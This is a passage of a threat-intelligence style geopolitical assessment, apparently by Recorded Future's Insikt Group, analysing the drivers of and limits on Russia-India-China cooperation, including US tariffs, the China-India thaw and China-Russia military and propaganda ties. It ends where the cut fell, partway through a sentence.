        <p>Although BRICS and SCO almost certainly represent viable opportunities for the three countries to foster trilateral cooperation, significant limitations prevent deeper alignment within these fora. The Russia-India-China (RIC) dialogue format, if rejuvenated, would offer the most likely format to formalize trilateral alignment. Insikt Group identified a range of potential indicators that are likely to reflect a coalescence into a political, economic, or military bloc.</p>
        <p>Deepening trilateral coordination would almost certainly have broad implications for both the public and private sectors, depending on the depth and intensity of the cooperation. For example, the formation of trilateral economic frameworks, such as lower trade barriers or coordinated regulatory schemes, would force private sector companies operating in any of these countries to adapt to new regulatory standards and potentially face increased competition from an enlarged trilateral economic market. Deeper defense cooperation could lead to shifts in the defense industry of each country, as markets adjust to serve the defense needs of each member of the trilateral. If this leads Chinese and Indian defense industries to increasingly look to serve Russian defense needs, it could force companies that currently produce dual-use technologies for China and India to make adjustments to avoid transacting with sanctioned Russian defense entities.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>The single greatest impediment to trilateral cooperation is very likely the deep distrust between China and India, which underpins political, economic, and military competition — including a decades-long border dispute. India’s doctrine of strategic autonomy and its pursuit of “multi-alignment” are likely to limit its willingness to join a formal trilateral bloc with China and Russia that is explicitly positioned as a counterweight to the West.</li>
          <li>However, all three states very likely share a desire for a multipolar world that includes more developed regional centers of power. This likely helps drive trilateral cooperation to avoid US influence that threatens the strategic interests of Russia, China, and India.</li>
          <li>The nearly decade-long strategic partnership between Moscow and Beijing is likely a key factor driving trilateral cooperation, as Russia and China have shared experience developing alternative centers of power to the West. Both states are likely motivated to convince India to adopt a similar strategy.</li>
          <li>An increase in US sanctions and tariffs is very likely to be a primary factor driving greater trilateral cooperation, as all three states seek alternative markets and China and India likely aim to avoid secondary sanctions. In contrast, Western government policies that facilitate China’s and India’s access to Western markets are likely to lessen Beijing’s and New Delhi’s incentive to deepen trilateral economic cooperation.</li>
          <li>Deepened trilateral economic cooperation very likely would increase the prospect that Western companies — especially those operating in India — see heavier state involvement in the private sector and greater Western scrutiny of Indian economic transactions to catch sanctions violations, as New Delhi aligns its practices with Moscow and Beijing.</li>
        </ul>
        <h2>Background: US Policy Likely Driving Nascent Cooperation Among China, India, and Russia</h2>
        <p>We assess that there are early signs of cooperation among India, China, and Russia in recent months and that this cooperation is likely to expand, driven primarily by an emerging thaw in China-India relations. Against the backdrop of strong India-Russia and China-Russia relations, this warming of China-India relations likely increases the prospect of a deeper trilateral relationship. However, a formal China-India-Russia bloc has not yet formed, and significant limitations –– particularly around Beijing-New Delhi tensions –– are likely to challenge such an alignment.</p>
        <p>India has likely calculated that the US’s 50% tariff on Indian exports –– imposed on India in August 2025, comprising a 25% reciprocal tariff and a 25% “penalty” tariff due to India purchasing sanctioned Russian oil –– <a href="https://www.livemint.com/economy/trump-tariffs-government-exploring-alternate-export-markets-to-protect-interests-of-farmers-11757323797479.html">necessitates</a> <a href="https://www.reuters.com/business/finance/indias-small-businesses-scramble-cushion-blow-trumps-50-tariffs-2025-08-28/">looking</a> for alternative markets and <a href="https://economictimes.indiatimes.com/news/economy/foreign-trade/indian-exporters-shift-focus-to-new-markets-amid-us-tariff-hike/articleshow/123621635.cms?from=mdr">deepening</a> foreign partnerships to recoup lost revenue and reinforce relationships India likely views as more reliable, including <a href="https://www.csmonitor.com/World/Asia-South-Central/2025/0930/india-china-trade-tariffs-ports">cultivating</a> its relationship with Beijing. On August 6, 2025, one day before the US imposed a 50% tariff on Indian exports to the US, the Indian Ministry of External Affairs <a href="https://www.mea.gov.in/Speeches-Statements.htm?dtl/39945/Statement_by_Official_Spokesperson#:~:text=Media%20Center,on:%206/8/2025">called</a> the US’s decision “unfair” and “unjustified” and vowed that India would “take all actions necessary to protect its national interests.” India has specifically <a href="https://timesofindia.indiatimes.com/business/india-business/us-tariffs-over-russian-oil-unfair-eam-jaishankar-says-actively-working-on-resolving-issues/articleshow/124320954.cms">highlighted</a> the inconsistency in the US’s application of a penalty tariff on India for importing Russian oil, while other countries, “even those with more adversarial relations with Russia,” have also sourced oil from Russia. China’s <a href="https://www.bloomberg.com/news/articles/2025-09-02/russia-s-oil-exports-swing-to-china-after-india-suffers-us-tariff-hit">increasing</a> oil imports from Russia likely reinforced to New Delhi that the US’s tariff policy was unjust. Indian officials are reportedly <a href="https://www.business-standard.com/external-affairs-defence-security/news/india-us-trade-deal-impact-trump-tariffs-us-supreme-court-125111001525_1.html">monitoring</a> the US Supreme Court case (challenging the Trump administration’s tariffs) to determine its impact on current US-India trade negotiations. A breakthrough in trade talks would likely improve, but not entirely <a href="https://www.lowyinstitute.org/the-interpreter/will-trade-deal-repair-india-us-ties">repair</a>, the deteriorating diplomatic and economic ties between India and the US.</p>
        <p>The US tariffs have likely also <a href="https://www.crisisgroup.org/asia-pacific/south-asia/india-china/india-rekindles-its-china-ties-trumps-tariffs-bite">reinforced</a> an emergent reconciliation between India and China. In August 2025, Chinese Foreign Minister Wang Yi visited New Delhi for the first time in three years. Beijing likely sees economic and political benefit to deepening ties with India, including exploiting the Indian market for Chinese exports and curbing US influence in South Asia. China’s trade surplus with India and status as the top exporter of electronics, telecommunications, and machinery to India likely give Beijing economic leverage in negotiations with India, particularly as India looks to recoup revenue lost due to US tariffs.</p>
        <p>Following Modi’s August 31, 2025, meeting with Xi –– Modi’s first visit to China in seven years, at the SCO Summit in Tianjin –– Modi <a href="https://www.indiatoday.in/india/story/read-full-statement-on-pm-modi-bilateral-meeting-with-president-xi-at-tianjin-sco-summit-2779553-2025-08-31">stated</a> that “a stable relationship and cooperation” between China and India was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century.” Amid India’s stated frustration over US tariffs, the highly publicized friendly interaction between Modi, Xi, and Putin <strong>(Figure 1)</strong> at the SCO Summit sparked concerns over an emergent Russia-India-China troika.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18c4f5e2ffd69ace89bc012728f00a6e81ca819c7.png?width=750&amp;format=png&amp;optimize=medium" width="486" height="441" />
        </p>
        <p><em><strong>Figure 1:</strong></em> <em>Photo posted by Modi of himself with Putin and Xi at the SCO Summit</em></p>
        <p><em>on August 31, 2025 (Source: Social Media)</em></p>
        <p>The nascent warming of China-India relations likely makes deeper trilateral cooperation among China, India, and Russia more probable, as China and Russia, as well as India and Russia, already have strong relations. Thus, a warming China-India relationship ameliorates the biggest barrier to the formation of a trilateral dynamic. In addition, all three states likely see political and economic benefits to deepening cooperation.</p>
        <h2>Areas of Bilateral Intersection and Divergence Among China, India, and Russia</h2>
        <p>Deepening trilateral cooperation among China, India, and Russia likely serves the strategic foreign policy interests of each state, though the trajectory of any fully formed trilateral dynamic is likely to be shaped by nuanced differences among each state’s foreign policy, as well as the bilateral dynamics within this group.</p>
        <h3>China’s Foreign Policy</h3>
        <p>China’s foreign policy toward Russia and India is almost certainly an outgrowth of the country’s primary strategic objectives. These include China’s “core interests,” <a href="https://archive.ph/IpxKT">such as</a> <a href="https://carnegieendowment.org/files/CLM34MS_FINAL.pdf">preserving</a> the CCP’s political power, territorial integrity, and economic development, as well as China’s <a href="https://chinaopensourceobservatory.org/glossary/advancing-towards-the-center-of-the-world-stage">efforts</a> to <a href="https://web.archive.org/web/20250219133111/https://www.fmprc.gov.cn/web/wjbzhd/202501/t20250117_11537992.shtml">shape</a> a “<a href="https://web.archive.org/web/20250310002304/https://www.mfa.gov.cn/eng/wjbzhd/202403/t20240308_11256418.html">multipolar</a>” world, which almost certainly entails independence from US coercion, an increase in China’s international influence, and greater global dependence on China. China very likely sees greater cooperation with Russia and India as supporting these goals, especially in relation to Beijing’s main <a href="https://web.archive.org/web/20230325133108/http://hochiminhcity.china-consulate.gov.cn/xwdt/202303/t20230306_11036576.html">perceived</a> <a href="https://archive.ph/5I8B8">threat</a> — the US. In particular, China almost certainly considers Russia a political, economic, and military partner that helps legitimize China’s narratives about the need for multipolarity and bolster its ability to defend itself from US coercion. China likely <a href="https://carnegieendowment.org/research/2022/12/a-historical-evaluation-of-chinas-india-policy-lessons-for-india-china-relations?lang=en">considers</a> India an important economic partner and judges that frayed India-US relations diminish the US’s efforts to encircle and contain China.</p>
        <h3>India’s Foreign Policy</h3>
        <p>India almost certainly <a href="https://rsis.edu.sg/rsis-publication/idss/ip25015-understanding-indias-evolving-policy-of-strategic-autonomy/">defines</a> its relationships with China and Russia through its <a href="https://www.mea.gov.in/press-releases.htm?dtl/40072">doctrine</a> of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in <a href="https://theloop.ecpr.eu/indias-sovereignty-paradox-neutrality-oil-and-the-price-of-multi-alignment/">founding</a> the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic <a href="https://government.economictimes.indiatimes.com/news/defence/between-empires-indias-diplomatic-balancing-act-with-the-usa-russia-and-china/121914598">balancing</a> <a href="https://www.chathamhouse.org/2025/07/back-back-brics-and-quad-meetings-highlight-indias-increasingly-difficult-balancing-act">act</a> seeking to <a href="https://eastasiaforum.org/2023/03/20/india-in-a-world-of-asymmetrical-multipolarity/">promote</a> an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also <a href="https://indiawrites.org/diplomacy/why-multi-alignment-matters-to-india-explains-jaishankar/">underpinned</a> by a “multi-alignment” policy, which very likely seeks to <a href="https://web.archive.org/web/20250910093650/https://www.thehindu.com/opinion/lead/indias-strategic-autonomy-in-a-multipolar-world/article70016666.ece">promote</a> and <a href="https://www.hudson.org/foreign-policy/indias-multi-alignment-rising-geopolitical-profile-aparna-pande">safeguard</a> India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. Consistent with its strategic independence, New Delhi has <a href="https://www.isdp.eu/publication/india-in-a-world-of-asymmetrical-multipolarity/">cultivated</a> its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.</p>
        <h3>Russia’s Foreign Policy</h3>
        <p>Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:</p>
        <p>Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most <a href="https://forbes.ge/en/the-most-sanctioned-countries/">sanctioned</a> state in the world.</p>
        <h3>China-Russia: Strategic Partners in Countering the West</h3>
        <p>In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly in their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– means these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.</p>
        <h4>Political Dynamics</h4>
        <p>Chinese and Russian leadership almost certainly see each other as primary strategic partners in <a href="https://www.reuters.com/world/xi-putin-hold-phone-call-ukraine-war-anniversary-state-media-says-2025-02-24/">advancing</a> the “multipolar” world. In 2023, Xi <a href="https://www.aljazeera.com/news/2023/3/22/xi-tells-putin-of-changes-not-seen-for-100">said</a> to Putin, “We are the ones driving” changes unseen in a century, and multiple <a href="https://www.airuniversity.af.edu/Portals/10/CASI/documents/Translations/2022-02-04%20China%20Russia%20joint%20statement%20International%20Relations%20Entering%20a%20New%20Era.pdf">joint</a> <a href="https://web.archive.org/web/20250829034246/http://en.kremlin.ru/supplement/6310">statements</a> have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the <a href="https://web.archive.org/web/20250908074225/https://tass.com/politics/2010229">Global Governance Initiative</a>, <a href="https://web.archive.org/web/20230322013452/https://www.fmprc.gov.cn/eng/zxxx_662805/202303/t20230322_11046184.html">Global Security Initiative</a>, and <a href="https://web.archive.org/web/20230322013452/https://www.fmprc.gov.cn/eng/zxxx_662805/202303/t20230322_11046184.html">Global Development Initiative</a>.</p>
        <p>Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have <a href="https://www.nytimes.com/2024/05/15/world/asia/putin-xi-china-summit.html#:~:text=Putin%20when%20he%20made%20Russia,more%20than%20any%20other%20leader.">met</a> over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia <a href="https://www.cfr.org/report/no-limits-china-russia-relationship-and-us-foreign-policy">declared</a> a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.</p>
        <p>Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">decreased</a> by roughly 10% since 2018. Though China has an officially neutral, though in practice somewhat pro-Russia, position on the war in Ukraine, the war very likely has had some negative effects on China, including potential trade <a href="https://www.kyivpost.com/post/60241">disruptions</a> and sanctions (<a href="https://www.eldwicklaw.com/uk-us-eu-sanctions-china/">1</a>, <a href="https://www.reuters.com/world/china/china-targets-two-eu-banks-retaliating-blocs-russia-sanctions-package-2025-08-13/">2</a>, <a href="https://edition.cnn.com/2024/10/18/china/us-sanctions-chinese-companies-attack-drones-russia-intl-hnk">3</a>). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, <a href="https://www.scmp.com/news/china/diplomacy/article/3316875/china-tells-eu-it-cannot-afford-russian-loss-ukraine-war-sources-say">prefers</a> a protracted conflict in Ukraine as it diverts the US’s focus away from China.</p>
        <p>At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document <a href="https://www.nytimes.com/2025/06/07/world/europe/china-russia-spies-documents-putin-war.html">prepared</a> by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.</p>
        <h4>Economic Dynamics</h4>
        <p>Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade <a href="https://carnegieendowment.org/russia-eurasia/politika/2024/05/china-russia-yuan?lang=en">denominated</a> in Chinese yuan.</p>
        <p>China has purchased increasingly more Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s import of Russian oil and natural gas has substantially <a href="https://asiasociety.org/policy-institute/china-russia-relations-start-war-ukraine">increased</a>. On September 2, 2025, Russia and China <a href="https://interfax.com/newsroom/top-stories/113563/">signed</a> a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China <a href="https://www.bbc.com/news/60571253">buys</a> Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly <a href="https://oilprice.com/Latest-Energy-News/World-News/Chinese-Oil-Buyers-Reduce-Russian-Purchases.html">cancelled</a> orders of Russian oil imports following US <a href="https://home.treasury.gov/news/press-releases/sb0290">sanctions</a> in late October 2025.</p>
        <p>In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of <a href="https://carnegieendowment.org/russia-eurasia/politika/2024/05/behind-the-scenes-chinas-increasing-role-in-russias-defense-industry?lang=en">dual-use</a> and <a href="https://www.politico.eu/article/china-firms-russia-body-armor-bullet-proof-drones-thermal-optics-army-equipment-shanghai-h-win/">military-relevant</a> <a href="https://www.rferl.org/a/russia-ukraine-china-sanctions-dual-use-yangjie-technology/33223415.html">goods</a> and <a href="https://www.reuters.com/business/aerospace-defense/chinese-drone-experts-worked-with-sanctioned-russian-arms-maker-sources-say-2025-09-25/">expertise</a>. As of mid-2025, dual-use exports to Russia likely have at least slightly <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">decreased</a> from their peak in 2024.</p>
        <p>Overall trade between China and Russia has also <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">grown</a> significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">double</a> that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border <a href="https://web.archive.org/web/20250918185912/http://english.scio.gov.cn/m/internationalexchanges/2025-05/08/content_117863724.html">crossings</a> –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also <a href="https://www.aspistrategist.org.au/aspis-china-defence-universities-tracker-rising-china-russia-links-defence-industry-ties-dual-use-tech-research/">expanding</a>, and China and Russia have <a href="https://web.archive.org/web/20240517015745/https://tass.com/politics/1789195">announced</a> deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).</p>
        <p>There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to <a href="https://asiasociety.org/policy-institute/china-russia-relations-start-war-ukraine">avoid</a> overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began <a href="https://www.reuters.com/business/finance/russia-payment-hurdles-with-china-partners-intensified-august-sources-say-2024-08-30/">halting</a> transactions with Russian customers, and at least one bank did so as recently as September 2025 after being <a href="https://finance.yahoo.com/news/key-chinese-bank-reportedly-halts-092655214.html">sanctioned</a> by the EU. In September 2024, China <a href="https://web.archive.org/web/20250529101130/https://www.gov.cn/zhengce/content/202410/content_6981399.htm">implemented</a> a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.</p>
        <h4>Military Dynamics</h4>
        <p>Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more <a href="https://www.cfr.org/article/where-china-russia-partnership-headed-seven-charts-and-maps">frequent</a> and more <a href="https://www.iss.europa.eu/publications/briefs/rehearsing-war-china-and-russias-military-exercises">complex</a>, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to <a href="https://web.archive.org/web/20250911010902/https://www.nato.int/docu/review/articles/2018/12/20/vostok-2018-ten-years-of-russian-strategic-exercises-and-warfare-preparation/index.html">participate</a> in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise <a href="https://www.scmp.com/news/china/diplomacy/article/3192074/signs-china-russia-military-trust-vostok-2022-war-games">involved</a> a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber <a href="https://www.norad.mil/Newsroom/Press-Releases/Article/3849184/norad-detects-tracks-and-intercepts-russian-and-prc-aircraft-operating-in-the-a/">flight</a> into the US’s air defense identification zone (ADIZ) around Alaska for the first time. In September 2025, China and Russia <a href="https://jamestown.org/program/first-joint-russian-prc-submarine-exercise-patrols-pacific/">conducted</a> their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.</p>
        <p>In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he <a href="https://web.archive.org/web/20241031071355/https://www.rt.com/russia/605735-russia-china-military-cooperation/">stated</a> that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further <a href="https://web.archive.org/web/20241108084758/https://www.gov.cn/lianbo/bumen/202410/content_6980333.htm">indicates</a> that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”</p>
        <p>Beyond military exercises, US officials have <a href="https://www.politico.eu/article/united-states-accuse-china-help-russia-war-kurt-campbell/">asserted</a> as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government <a href="https://www.theguardian.com/world/2025/apr/18/ukraine-war-briefing-china-arming-russia-and-building-weapons-on-its-soil-says-zelenskyy">asserts</a> that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is <a href="https://archive.ph/Ewzr6">providing</a> Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US <a href="https://www.bbc.com/news/world-asia-china-64421915">sanctioned</a> a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were <a href="https://www.reuters.com/business/aerospace-defense/chinese-drone-experts-worked-with-sanctioned-russian-arms-maker-sources-say-2025-09-25/">working</a> on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been <a href="https://www.cbsnews.com/news/eagle-s-how-yi-peng-3-and-newnew-polar-bear-wreaked-havoc-in-baltic-sea-60-minutes/">involved</a> in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.</p>
        <p>Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.</p>
        <h4>Cooperation in Propaganda and Influence Operations</h4>
        <p>We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, <a href="https://www.wilsoncenter.org/publication/china-russia-convergence-communication-sphere-exploring-growing-information-nexus">including</a> media forums, journalist exchanges activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement <a href="https://web.archive.org/web/20250509070130/https://www.gov.cn/yaowen/liebiao/202505/content_7023051.htm">stating</a> that they would “jointly articulate a common stance in the global media space.”</p>
        <p>China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) <a href="https://theintercept.com/2022/12/30/russia-china-news-media-agreement/">shows</a> that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) <a href="https://www.recordedfuture.com/research/empire-dragon-accelerates-covert-information-operations-converges-russian-narratives">spread</a> narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely <a href="https://www.philstar.com/headlines/2025/08/25/2466374/copypasta-army-vietnam-smeared-bots-backing-duterte-x">used</a> a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.</p>
        <p>Since approximately 2019, China has <a href="https://demtech.oii.ox.ac.uk/wp-content/uploads/sites/12/2019/09/CyberTroop-Report19.pdf">increasingly</a> used computational propaganda and influence operation tactics likely <a href="https://www.washingtonpost.com/outlook/trump-wants-china-to-help-him-win-china-wants-nothing-to-do-with-him/2019/10/10/15fddd9a-eadf-11e9-9c6d-436a0df4f31d_story.html">learned</a> by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently <a href="https://journals.sagepub.com/doi/pdf/10.1177/17427665251328117?utm_source=chatgpt.com">frame</a> the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta <a href="https://www.theverge.com/2022/3/1/22956532/facebook-russian-state-media-global-recommendation-suspension">banned</a> Russian state media outlets from purchasing ads on its platforms, China Global TV Network <a href="https://www.axios.com/2022/03/09/chinas-state-media-meta-facebook-ads-russia?utm_source=chatgpt.com">placed</a> at least 21 pro-Russia advertisements on Facebook in a single month.</p>
        <h3>China-India: Nascent Thaw of Longtime Tension-Filled Relationship</h3>
        <p>China-India relations have <a href="https://strategicspace.nbr.org/cooperation-coexistence-and-contestation-in-indias-and-chinas-overlapping-strategic-spaces/">gone</a> through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.</p>
        <p>In recent months, China-India relations have likely <a href="https://web.archive.org/web/20250906232150/https://thediplomat.com/2025/09/china-india-transactional-thaw-or-structured-detente/">returned</a> to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely <a href="https://www.nytimes.com/2025/08/18/world/asia/india-china-trump.html">driven</a> India to pursue <a href="https://timesofindia.indiatimes.com/blogs/toi-edit-page/first-tango-in-five-years/">improved</a> ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” <a href="https://timesofindia.indiatimes.com/business/india-business/donald-trumps-tariffs-on-india-pm-modi-and-donald-trump-sco-meet-india-and-china-vladimir-putin/articleshow/123547432.cms">challenging</a> years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, <a href="https://www.indiatoday.in/india/story/read-full-statement-on-pm-modi-bilateral-meeting-with-president-xi-at-tianjin-sco-summit-2779553-2025-08-31">noted</a> that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. Despite this nascent <a href="https://indianexpress.com/article/india/modis-china-visit-in-2-readouts-a-message-and-a-signal-strategic-autonomy-fair-trade-10222915/">rapprochement</a>, significant hurdles and unresolved disagreements <a href="https://web.archive.org/web/20250725103521/https://thediplomat.com/2025/07/the-limits-of-pragmatic-intentions-the-evolving-story-of-china-india-rapprochement/">remain</a>, making it less likely that China and India will form a long-term strategic partnership.</p>
        <h4>Political Dynamics</h4>
        <p>China’s approach to India is likely primarily <a href="https://carnegieendowment.org/research/2022/12/a-historical-evaluation-of-chinas-india-policy-lessons-for-india-china-relations?lang=en">driven</a> by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to <a href="https://chinapower.csis.org/analysis/china-upgrading-dual-use-xiaokang-villages-india-border/">consolidate</a> control over disputed border territories, <a href="https://www.usip.org/publications/2023/05/why-we-should-all-worry-about-china-india-border-dispute">leading</a> to deadly skirmishes with India and <a href="https://www.recordedfuture.com/research/redecho-targeting-indian-power-sector">cyberattacks</a> <a href="https://www.recordedfuture.com/research/continued-targeting-of-indian-power-grid-assets">against</a> Indian critical infrastructure. India’s approach to China has likely been <a href="https://www.cfr.org/backgrounder/china-india-relationship-between-cooperation-and-competition">rooted</a> in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.</p>
        <p>Over the last year, China and India’s relations have <a href="https://www.reuters.com/world/china/ties-thaw-between-asian-rivals-india-china-2025-08-29/">thawed</a> significantly, especially compared to 2020, when the China-India border dispute <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">escalated</a>. In 2024, China and India <a href="https://www.cnn.com/2024/10/22/asia/india-china-border-agreement-intl-hnk">concluded</a> an agreement that <a href="https://www.reuters.com/world/asia-pacific/india-china-start-pulling-back-troops-border-face-off-points-source-says-2024-10-25/">returned</a> the border to its pre-2020 status, thereby completing a disengagement process and <a href="https://www.indiatoday.in/india/story/india-china-reopen-three-himalayan-trade-passes-after-five-years-2775110-2025-08-22">reopening</a> border trade. India and China began <a href="https://frontline.thehindu.com/world-affairs/india-china-relations-border-economic-trade/article69996270.ece">re-engaging</a> in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India <a href="https://www.lowyinstitute.org/the-interpreter/what-resuming-direct-india-china-flights-reveals-about-changing-regional-priorities">resumed</a> direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar <a 